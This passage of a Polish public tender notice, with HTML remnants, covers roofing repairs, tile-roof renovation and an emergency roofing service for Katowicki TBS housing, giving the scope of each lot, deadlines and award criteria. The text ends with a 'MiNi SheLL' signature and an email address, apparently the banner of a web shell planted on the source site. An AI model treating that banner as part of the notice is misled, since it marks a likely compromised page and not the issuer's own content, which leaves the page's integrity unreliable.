a)	Pokrycie dachu jednowarstwowe renowacyjne: z drobną naprawą istniejącego pokrycia, zagruntowaniem podłoża Simplast Promer szybki grunt SBS oraz położenie papy wierzchniego krycia aktywowanej termicznie extra wentylacja TOP 5,2 szybki syntan SBS. Prace pokrywcze obejmują obrobienie wewnętrznego koryta odpływowego na dachach z ewentualną wymianów wpustów, montaż kominków wentylacyjnych. Zamawiający dopuszcza stosowanie papy innych producentów posiadającej atest dopuszczeniowy na polskim rynku i posiadające parametry techniczne, jak wymieniona papa. 
b)	Wykonanie przy styku kominów z dachem, ścianach, ogniomurach, trójkątów (skosów) o bokach min. 7x7 cm, w celu likwidacji ostrego załamania papy służącej do wywinięcia obróbek z papy termozgrzewalnej na powierzchni ścian i kominów i ogniomurów.
c)	Wykonanie nowego obrobienia kominów, ogniomurów dachu, kominów wywiewek kanalizacyjnych, murów przybudówek na dachu itp. jednowarstwowo papą wierzchniego krycia aktywowaną termicznie extra wentylacja TOP 5,2 szybki syntan SBS z naprawą podłoża (usuwanie nierówności, uszczelniania ubytków, demontaż istniejących listew mocujący obróbki, montaż nowych na położonych kołnierzach z papy itp.). Zamawiający dopuszcza stosowanie papy innych producentów posiadającej atest dopuszczeniowy na polskim rynku i posiadającej  parametry techniczne, jak wymieniona papa. 
d)	Demontaż instalacji odgromowej i ponowny jej montaż po położeniu pokrycia dachowego z ewentualną częściową wymianą podkładek pod instalację. Po wykonanych pracach należy wykonać kontrolne badania instalacji odgromowej potwierdzone protokołem z pomiarów. 
e)	Uszczelnienie styków kominów, obróbek blacharskich, ogniomurów, świetlików, rur wentylacji sanitarnej itp. 
f)	Koszty związane z urządzeniem i organizacją terenu związanego z robotami:
- Wartość wszystkich robót przygotowawczych i budowlanych,
- Właściwe zabezpieczenie prowadzonych robót,
- Odszkodowania za szkody wynikłe w związku z prowadzonymi robotami,
- Ubezpieczenie budowy i osób przebywających na terenie budowy
- Dozór materiałów i wykonanych robót,
- Urządzenie zaplecza budowy,
- Wywóz nieczystości stałych i ich utylizacja itp.
g)	Uporządkowanie terenu związanego z prowadzonymi robotami po zakończeniu robót i przywrócenie do stanu pierwotnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres rękojmi i gwarancji - 15</li>
<li>3. Wysokość kar umownych za każdy dzień przekroczenia terminu realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> roboty remontowe dachów z dachówki ceramicznej 9 budynków mieszkalnych wielorodzinnych przy ul. Pod Kasztanami 41 - 83 w Katowicach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osiedle mieszkaniowe KTBS Sp. z o.o. Giszowiec - Kasztany w Katowicach składa się z 9 budynków typu niskiego. Można podzielić na następujące grupy budynków o podobnej konstrukcji i wielkości:
TYP nr 1 - Pod Kasztanami 41-43, 45-47, 49-51 i 69-71.
TYP nr 2 - Pod Kasztanami 73-75-77, 79-81-83. 
TYP nr 3 - Pod Kasztanami 53-56, 57-59-61-63 i 65-67.
W budynkach tych występują dachy spadziste pokryte dachówką ceramiczną karpiówką.  
Złożona oferta musi uwzględniać wszystkie elementy przedmiot zamówienia, założeń do remontu i zawierać następujący zakres robót:
a)	Rozbiórka uszkodzonych obróbek wokół kominów z częściowym rozebraniem dachówek ceramicznych. 
b)	Położenie nowych obróbek wokół kominów oraz położenie dachówek dobrze przymocowanych do podłoża, aby uniknąć usuwanie się ich (szczególnie w okresie zimowym z nawisami śniegu). 
c)	Naprawa uszkodzonych czap kominowych ( skucie i ponowne wylanie). 
d)	Przedłużenie rynny nad garażem w budynku Pod Kasztanami 73-75-77. 
e)	Rozbiórka pokrycia z dachówek w miejscu montaż dodatkowych płotów przeciwśniegowych. 
f)	Dodatkowy montaż łat drewnianych w okolicy nowych płotków przeciwśniegowych w celu wzmocnienia podparcia dachówek (przeciwdziałanie spękaniu dachówek pod ciężarem śniegu zalegającego na płotkach). 
g)	Montaż nowych płotków i uzupełnienie połaci dachówkami (wejście do budynku główne, wejście z ogrodu do mieszkania, nad garażami).   
h)	Przegląd: stóp i ław kominiarskich, odpowietrzników kanalizacji, systemowych z drobną naprawą (nocowaniem) lub częściową wymianą. Przegląd wymurowania kominów z cegły klinkierowej z ewentualnym uzupełnieniem fug i pękniętych cegieł.    
i)	Koszty związane z urządzeniem i organizacją terenu związanego z robotami:
- Wartość wszystkich robót przygotowawczych i budowlanych,
- Właściwe zabezpieczenie prowadzonych robót,
- Odszkodowania za szkody wynikłe w związku z prowadzonymi robotami,
- Ubezpieczenie budowy i osób przebywających na terenie budowy
- Dozór materiałów i wykonanych robót,
- Urządzenie zaplecza budowy,
- Wywóz nieczystości stałych i ich utylizacja itp.
j)	Uporządkowanie terenu związanego z prowadzonymi robotami po zakończeniu robót i przywrócenie do stanu pierwotnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres rękojmi i gwarancji - 15</li>
<li>3. Wysokość kar umownych za każdy dzień przekroczenia terminu realizacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> świadczenie usług pogotowia dekarskiego dla całego zasobu mieszkaniowego Katowickiego TBS Sp. z o.o..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje bieżące wykonywanie drobnych napraw i konserwacji dekarskich (wg rzeczywistych i stwierdzonych potrzeb) o następującym zakresie rzeczowym:
1)     częściowe przełożenie różnego rodzaju dachówki oraz innych rodzajów pokryć dachów,
2)     naprawa rynien i rur spustowych, w tym:
- rozebranie i montaż rynien i rur spustowych, klejenie, lutowanie
3)	izolacja szczelin dylatacyjnych konstrukcyjnych kitem,
4)	wymiana pokrycia murów, pasów pod i nadrynnowych,
5)	wymiana opierzeń z blachy ocynkowanej,
6)	częściowa wymiana rynien i rur spustowych,
7)	wymiana parapetów zewnętrznych,
8)	uzupełnienie pokryć dachowych z dachówki cementowej,
9)	uszczelnienie od spodu pokrycia dachowego,
10)	krycie częściowe dachów papą termozgrzewalną,
11)	przecinanie pęcherzy i wstawianie łat z papy,
12)	uzupełnienie różnego rodzaju obróbek blacharskich,
13)	częściowa wymiana deskowania dachu,
14)	uzupełnienie gąsiorów dachowych,
15)	częściowe przemurowanie głowic kominowych,
16)	przedłużanie głowic kominowych,
17)	wzmocnienie krokwi,
18)	wymiana końców krokwi,
19)	wymiana desek czołowych,
20)	wymiana ław kominiarskich,
21)	czyszczenie rynien,
22)	usuwanie sopli z rynien, rur spustowych
23)	usuwanie nawisów i śniegu z dachu,
24)	uzupełnienie kolanek z blachy ocynkowanej,
25)	wymiana rur wentylacyjnych z blachy,
26)	rozbiórka i wzmocnienie elementów więźb dachowych,
27)	wstawianie drzwiczek wyciorowych,
28)	awaryjna wymiana okien dachowych połaciowych,
29)	wymiana lub czyszczenie osadników do rury spustowej,
30)	wywiezienie gruzu z terenu prowadzonych prac,
31)	zrzucanie śniegu z powierzchni dachów i stropodachów,
32)	likwidacja nawisów śnieżnych i sopli,
33)	skuwanie lodu z rynien, rur spustowych i pasów podrynnowych,
34)	uporządkowanie przyległych do budynków chodników ze zrzuconego śniegu i lodu,
35)	w razie potrzeby wywóz  zrzuconego śniegu,
36)	w okresie jesiennym - usuwanie liści z dachu, rynien i udrożnianie rur spustowych,
37)	naprawy pasa podrynnowego lub nadrynnowego
38)	naprawy rynny półokrągłej,
39)	naprawy rynny skrzynkowej,
40)	wymiana rynny półokrągłej,
41)	wymiana rynny skrzynkowej,
42)	obróbka blacharska muru ogniowego, gzymsu, okapu, komina, itp.,
43)	obróbka komina, muru ogniowego papą termozgrzewalną,
44)	naprawa deskowania połaci dachowych,
45)	wymiana desek dachowych grub. 32 mm,
46)	naprawa wzmocnienia konstrukcji dachu,
47)	naprawa punktowa pokrycia papowego, 
48)	wstawianie łat z papy termozgrzewalnej,
49)	wykonanie innych robót o podobnym charakterze nie wymienionych powyżej.
Ilość prac do wykonania będzie określana na podstawie zgłoszeń i stwierdzonych potrzeb. Kosztorys robót określa szacunkowo ilość robót do ewentualnego wykonania. Rozliczenie prac następować będzie na podstawie kosztorysów powykonawczych sporządzonych na podstawie stawek podanych w ofercie i zasadach określonych niniejszą SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres rękojmi i gwarancji - 15</li>
<li>3. Wysokość kar umownych za każdy dzień przekroczenia terminu realizacji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com